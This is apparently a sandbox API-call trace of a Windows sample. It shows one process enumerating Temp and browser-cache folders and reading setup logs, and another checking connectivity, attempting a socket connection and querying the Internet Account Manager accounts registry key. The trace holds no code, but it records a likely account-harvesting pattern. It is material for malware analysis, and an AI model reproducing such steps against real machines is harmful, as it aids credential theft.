FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x000p\xb3\x12\xe3\x91\xcf\x01\x10\xba`g\xe3\x91\xcf\x01\x90~\xb6\x12\xe3\x91\xcf\x01\x90~\xb6\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00`\xf7\xb4\x12\xe3\x91\xcf\x01`\xf7\xb4\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01`\xf7\xb4\x12\xe3\x91\xcf\x01\xa5\x18\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\x90~\xb6\x12\xe3\x91\xcf\x01\x90~\xb6\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\x90~\xb6\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,574 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,574 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,654 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\3082\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,654 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90~\xb6\x12\xe3\x91\xcf\x01\xa0\xdcLg\xe3\x91\xcf\x01\xf0\x8c\xb9\x12\xe3\x91\xcf\x01\xf0\x8c\xb9\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ p\x00\x00\x00\x00\x00\x00\x00\xc0\x05\xb8\x12\xe3\x91\xcf\x01\xc0\x05\xb8\x12\xe3\x91\xcf\x01\x00\xe3\xd9i\xd3\xc0\xca\x01\xc0\x05\xb8\x12\xe3\x91\xcf\x01\xfd\x0b\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00e\x00u\x00l\x00a\x00.\x00r\x00t\x00f\x00t \x80\x00\x00\x00\x00\x00\x00\x00\xc0\x05\xb8\x12\xe3\x91\xcf\x01\xc0\x05\xb8\x12\xe3\x91\xcf\x01\x00\xdc\x98S\xfe\xc6\xca\x01\xc0\x05\xb8\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,654 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,654 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:48,735 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\Client\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:48,735 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x8c\xb9\x12\xe3\x91\xcf\x01\x80\xe8\x8fk\xe3\x91\xcf\x01P\x9b\xbc\x12\xe3\x91\xcf\x01P\x9b\xbc\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00D W \ \x80\x00\x00\x00\x00\x00\x00\x00 \x14\xbb\x12\xe3\x91\xcf\x01 \x14\xbb\x12\xe3\x91\xcf\x01\x00\xbc\xe2\x0c\xd5\xc6\xca\x01 \x14\xbb\x12\xe3\x91\xcf\x01D\x14\x03\x00\x00\x00\x00\x00\x00 \x03\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00P\x00A\x00R\x00A\x00M\x00E\x00~\x001\x00.\x00X\x00M\x00L\x00P\x00a\x00r\x00a\x00m\x00e\x00t\x00e\x00r\x00i\x00n\x00f\x00o\x00.\x00x\x00m\x00l\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x9b\xbc\x12\xe3\x91\xcf\x01P\x9b\xbc\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:48,735 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:48,735 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\DHtmlHeader.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:48,745 | 504 | NtReadFile |
Buffer => \xff\xfe<\x00!\x00D\x00O\x00C\x00T\x00Y\x00P\x00E\x00 \x00h\x00t\x00m\x00l\x00 \x00P\x00U\x00B\x00L\x00I\x00C\x00 \x00"\x00-\x00/\x00/\x00W\x003\x00C\x00/\x00/\x00D\x00T\x00D\x00 \x00X\x00H\x00T\x00M\x00L\x00 \x001\x00.\x001\x00/\x00/\x00E\x00N\x00"\x00 \x00"\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00w\x003\x00.\x00o\x00r\x00g\x00/\x00T\x00R\x00/\x00x\x00h\x00t\x00m\x00l\x001\x001\x00/\x00D\x00T\x00D\x00/\x00x\x00h\x00t\x00m\x00l\x001\x001\x00.\x00d\x00t\x00d\x00"\x00>\x00
\x00
\x00<\x00!\x00-\x00-\x00 \x00T\x00h\x00e\x00 \x00E\x00x\x00t\x00e\x00n\x00d\x00e\x00d\x00 \x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00/\x00 FileHandle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 07:44:48,995 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001a8 |
FAILURE | 3221225489 | |
| 07:44:48,995 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:49,045 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:49,045 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:49,045 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:49,045 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:49,045 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:49,075 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\Extended\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:49,075 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xa9\xbf\x12\xe3\x91\xcf\x01p\x08\xab\x86\xe4\x91\xcf\x01\xe00\xc1\x12\xe3\x91\xcf\x01\xe00\xc1\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00p : / \x80\x00\x00\x00\x00\x00\x00\x00\xb0\xa9\xbf\x12\xe3\x91\xcf\x01\xb0\xa9\xbf\x12\xe3\x91\xcf\x01\x00Oq*\xf0\xc6\xca\x01\xb0\xa9\xbf\x12\xe3\x91\xcf\x01\x82l\x01\x00\x00\x00\x00\x00\x00p\x01\x00\x00\x00\x00\x00 \x00\x00\x00"\x00\x00\x00\x00\x00\x00\x00\x18\x00P\x00A\x00R\x00A\x00M\x00E\x00~\x001\x00.\x00X\x00M\x00L\x00P\x00a\x00r\x00a\x00m\x00e\x00t\x00e\x00r\x00i\x00n\x00f\x00o\x00.\x00x\x00m\x00l\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe00\xc1\x12\xe3\x91\xcf\x01\xe00\xc1\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:49,075 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:49,075 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:49,175 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4 Setup_4.0.30319\Graphics\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:44:49,175 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe00\xc1\x12\xe3\x91\xcf\x01 I\x8em\xe3\x91\xcf\x01\xf0\xff\xd1\x12\xe3\x91\xcf\x01\xf0\xff\xd1\x12\xe3\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00p : / p\x00\x00\x00\x00\x00\x00\x00\x10\xb8\xc2\x12\xe3\x91\xcf\x01\x10\xb8\xc2\x12\xe3\x91\xcf\x01\x00\xba\x82\xbd(*\xca\x01\x10\xb8\xc2\x12\xe3\x91\xcf\x01~\x04\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x00r\x00i\x00n\x00t\x00.\x00i\x00c\x00o\x00x\x00\x00\x00\x00\x00\x00\x00@?\xc4\x12\xe3\x91\xcf\x01@?\xc4\x12\xe3\x91\xcf\x01\x00\xba\x82\xbd(*\xca\x01@?\xc4\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:49,175 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001a8 FileInformation => |
FAILURE | 2147483654 | |
| 07:44:49,175 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => \x80\x00\x00\x00\x00\x00\x00\x00\x00\xbf+\xcd\x98=\xca\x01 \xb3C\x16\xe3\x91\xcf\x01\x00\xbf+\xcd\x98=\xca\x010R\xcd\x14\xe3\x91\xcf\x01\x00r\x01\x00\x00\x00\x00\x00\x00\x80\x01\x00\x00\x00\x00\x00 \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x18\x00R\x00G\x00B\x009\x00R\x00A\x00~\x001\x00.\x00M\x00S\x00I\x00R\x00G\x00B\x009\x00R\x00A\x00S\x00T\x00_\x00x\x008\x006\x00.\x00m\x00s\x00i\x00\xcf\x01p\x00\x00\x00\x00\x00\x00\x00P\x0e\xd5\x12\xe3\x91\xcf\x01P\x0e\xd5\x12\xe3\x91\xcf\x01\x00\xf6\x0f\xe4\xd7\xc6\xca\x01P\x0e\xd5\x12\xe3\x91\xcf\x01H1\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x12\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00e\x00t\x00u\x00p\x00.\x00e\x00x\x00e\x00\x80\x00\x00\x00\x00\x00\x00\x00\x80\x95\xd6\x12\xe3\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:49,175 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:44:49,185 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\Microsoft .NET Framework 4.5.1 Setup_20140626_203051660.html DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:49,195 | 504 | NtReadFile |
Buffer => \xff\xfe<\x00!\x00D\x00O\x00C\x00T\x00Y\x00P\x00E\x00 \x00h\x00t\x00m\x00l\x00 \x00P\x00U\x00B\x00L\x00I\x00C\x00 \x00"\x00-\x00/\x00/\x00W\x003\x00C\x00/\x00/\x00D\x00T\x00D\x00 \x00X\x00H\x00T\x00M\x00L\x00 \x001\x00.\x001\x00/\x00/\x00E\x00N\x00"\x00 \x00"\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00w\x003\x00.\x00o\x00r\x00g\x00/\x00T\x00R\x00/\x00x\x00h\x00t\x00m\x00l\x001\x001\x00/\x00D\x00T\x00D\x00/\x00x\x00h\x00t\x00m\x00l\x001\x001\x00.\x00d\x00t\x00d\x00"\x00>\x00
\x00
\x00<\x00!\x00-\x00-\x00 \x00T\x00h\x00e\x00 \x00E\x00x\x00t\x00e\x00n\x00d\x00e\x00d\x00 \x00C\x00o\x00p\x00y\x00r\x00i\x00g\x00h\x00t\x00/\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:49,466 | 504 | NtReadFile |
Buffer => s\x00=\x00"\x00t\x00"\x00>\x00[\x006\x00/\x002\x006\x00/\x002\x000\x001\x004\x00,\x00 \x002\x000\x00:\x003\x000\x00:\x005\x000\x00]\x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00A\x00d\x00d\x00i\x00n\x00g\x00 \x00I\x00t\x00e\x00m\x00 \x00t\x00y\x00p\x00e\x00 \x00"\x00F\x00i\x00l\x00e\x00"\x00,\x00 \x00l\x00o\x00c\x00a\x00l\x00 \x00p\x00a\x00t\x00h\x00 \x00n\x00e\x00t\x00f\x00x\x00_\x00F\x00u\x00l\x00l\x00_\x00x\x006\x004\x00.\x00m\x00s\x00i\x00<\x00B\x00R\x00>\x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00
\x00
\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00m\x00s\x00g\x00"\x00>\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:49,546 | 504 | NtReadFile |
Buffer => \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00a\x00c\x00t\x00"\x00>\x00<\x00d\x00i\x00v\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00s\x00e\x00c\x00t\x00i\x00o\x00n\x00H\x00d\x00r\x00"\x00>\x00<\x00a\x00 \x00h\x00r\x00e\x00f\x00=\x00"\x00#\x00"\x00 \x00o\x00n\x00c\x00l\x00i\x00c\x00k\x00=\x00"\x00t\x00o\x00g\x00g\x00l\x00e\x00S\x00e\x00c\x00t\x00i\x00o\x00n\x00(\x00)\x00;\x00 \x00e\x00v\x00e\x00n\x00t\x00.\x00r\x00e\x00t\x00u\x00r\x00n\x00V\x00a\x00l\x00u\x00e\x00=\x00f\x00a\x00l\x00s\x00e\x00;\x00"\x00>\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00s\x00e\x00c\x00t\x00i\x00o\x00n\x00E\x00x\x00p\x00"\x00>\x00<\x00s\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:49,656 | 504 | NtReadFile |
Buffer => a\x00t\x00e\x00d\x00 \x00t\x00o\x00 \x00f\x00a\x00l\x00s\x00e\x00<\x00B\x00R\x00>\x00<\x00/\x00d\x00i\x00v\x00>\x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00
\x00
\x00<\x00/\x00d\x00i\x00v\x00>\x00<\x00d\x00i\x00v\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00s\x00e\x00c\x00t\x00i\x00o\x00n\x00H\x00d\x00r\x00"\x00>\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00t\x00"\x00>\x00[\x006\x00/\x002\x006\x00/\x002\x000\x001\x004\x00,\x00 \x002\x000\x00:\x003\x000\x00:\x005\x002\x00]\x00 \x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00A\x00n\x00d\x00 \x00e\x00v\x00a\x00l\x00u\x00a\x00t\x00e\x00d\x00 \x00t\x00o\x00 \x00f\x00a\x00l\x00s\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:49,756 | 504 | NtReadFile |
Buffer => n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00m\x00s\x00g\x00"\x00>\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00t\x00"\x00>\x00[\x006\x00/\x002\x006\x00/\x002\x000\x001\x004\x00,\x00 \x002\x000\x00:\x003\x000\x00:\x005\x003\x00]\x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00S\x00e\x00t\x00u\x00p\x00 \x00c\x00a\x00n\x00n\x00o\x00t\x00 \x00c\x00o\x00n\x00t\x00i\x00n\x00u\x00e\x00 \x00b\x00e\x00c\x00a\x00u\x00s\x00e\x00 \x00a\x00 \x00p\x00r\x00e\x00v\x00i\x00o\x00u\x00s\x00 \x00i\x00n\x00s\x00t\x00a\x00l\x00l\x00a\x00t\x00i\x00o\x00n\x00 \x00r\x00e\x00q\x00u\x00i\x00r\x00e\x00s\x00 \x00y\x00o\x00u\x00r\x00 \x00c\x00o\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:49,826 | 364 | connect |
socket => 0x000001cc |
FAILURE | 4294967295 | |
| 07:44:49,826 | 364 | closesocket |
socket => 0x000001cc |
SUCCESS | 0x00000000 | |
| 07:44:49,826 | 364 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x80000001 SubKey => Software\Microsoft\Internet Account Manager\Accounts |
FAILURE | 0x00000002 | |
| 07:44:49,826 | 364 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x0000b000 BaseAddress => 0x00174000 |
SUCCESS | 0x00000000 | |
| 07:44:49,826 | 364 | ExitThread |
ExitCode => 0 |
SUCCESS | 0x00000000 | |
| 07:44:49,846 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:49,846 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:49,846 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:49,846 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:49,846 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:49,856 | 504 | NtReadFile |
Buffer => "\x00>\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00t\x00"\x00>\x00[\x006\x00/\x002\x006\x00/\x002\x000\x001\x004\x00,\x00 \x002\x000\x00:\x003\x000\x00:\x005\x005\x00]\x00 \x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00O\x00r\x00 \x00e\x00v\x00a\x00l\x00u\x00a\x00t\x00e\x00d\x00 \x00t\x00o\x00 \x00t\x00r\x00u\x00e\x00<\x00B\x00R\x00>\x00<\x00/\x00d\x00i\x00v\x00>\x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00
\x00
\x00<\x00/\x00d\x00i\x00v\x00>\x00<\x00d\x00i\x00v\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00s\x00e\x00c\x00t\x00i\x00o\x00n\x00H\x00d\x00r\x00"\x00>\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:49,946 | 504 | NtReadFile |
Buffer => n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00a\x00c\x00t\x00"\x00>\x00<\x00d\x00i\x00v\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00s\x00e\x00c\x00t\x00i\x00o\x00n\x00H\x00d\x00r\x00"\x00>\x00<\x00a\x00 \x00h\x00r\x00e\x00f\x00=\x00"\x00#\x00"\x00 \x00o\x00n\x00c\x00l\x00i\x00c\x00k\x00=\x00"\x00t\x00o\x00g\x00g\x00l\x00e\x00S\x00e\x00c\x00t\x00i\x00o\x00n\x00(\x00)\x00;\x00 \x00e\x00v\x00e\x00n\x00t\x00.\x00r\x00e\x00t\x00u\x00r\x00n\x00V\x00a\x00l\x00u\x00e\x00=\x00f\x00a\x00l\x00s\x00e\x00;\x00"\x00>\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00s\x00e\x00c\x00t\x00i\x00o\x00n\x00E\x00x\x00p\x00"\x00>\x00<\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:50,137 | 504 | NtReadFile |
Buffer => o\x00n\x00H\x00d\x00r\x00"\x00>\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00t\x00"\x00>\x00[\x006\x00/\x002\x006\x00/\x002\x000\x001\x004\x00,\x00 \x002\x000\x00:\x003\x000\x00:\x005\x006\x00]\x00 \x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00B\x00l\x00o\x00c\x00k\x00I\x00f\x00 \x00e\x00v\x00a\x00l\x00u\x00a\x00t\x00e\x00d\x00 \x00t\x00o\x00 \x00f\x00a\x00l\x00s\x00e\x00<\x00B\x00R\x00>\x00<\x00/\x00d\x00i\x00v\x00>\x00<\x00/\x00s\x00p\x00a\x00n\x00>\x00
\x00
\x00
\x00
\x00<\x00s\x00p\x00a\x00n\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00"\x00a\x00c\x00t\x00"\x00>\x00<\x00d\x00i\x00v\x00 \x00c\x00l\x00a\x00s\x00s\x00=\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:50,157 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:50,157 | 504 | NtFreeVirtualMemory |
FreeType => 0x00004000 ProcessHandle => 0xffffffff RegionSize => 0x0000d000 BaseAddress => 0x00183000 |
SUCCESS | 0x00000000 | |
| 07:44:50,157 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Temp\uxeventlog.txt DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:50,177 | 504 | NtReadFile |
Buffer => \xff\xfe[\x000\x006\x00/\x002\x006\x00/\x001\x004\x00,\x002\x000\x00:\x003\x008\x00:\x005\x004\x00]\x00 \x00W\x00a\x00t\x00s\x00o\x00n\x00 \x00U\x00X\x00 \x00D\x00a\x00t\x00a\x00 \x00L\x00o\x00g\x00g\x00i\x00n\x00g\x00 \x00s\x00t\x00a\x00r\x00t\x00e\x00d\x00
\x00
\x00[\x000\x006\x00/\x002\x006\x00/\x001\x004\x00,\x002\x000\x00:\x003\x008\x00:\x005\x004\x00]\x00 \x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00=\x00
\x00
\x00[\x000\x006\x00/\x002\x006\x00/\x001\x004\x00,\x002\x000\x00:\x003\x008\x00:\x005\x004\x00]\x00 \x00U\x00s\x00e\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:50,207 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:50,207 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:44:50,207 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:50,287 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\*.* |
SUCCESS | 0x0016c138 | |
| 07:44:50,287 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x01\xb08,\x8dX\x94\xcf\x010\xa93\xbb\xd5I\xcd\x01\x10O]\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00x\x00\x00\x00\x00\x00\x00\x00\x10\xf5Y\xb9\xd5I\xcd\x01\xb08,\x8dX\x94\xcf\x01\xe0o\xa69\xd5I\xcd\x01P\xa5o\x89X\x94\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00o\x00n\x00t\x00e\x00n\x00t\x00.\x00I\x00E\x005\x00\xe2\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x90.f\xb9\xd5I\xcd\x01\xb0\xe8f\xec\xdf\x91\xcf\x010\xa93\xbb\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:44:50,287 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:44:50,367 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\TDW\Local Settings\Temporary Internet Files\Content.IE5\*.* |
SUCCESS | 0x0016c170 | |
| 07:44:50,367 | 504 | NtQueryDirectoryFile |
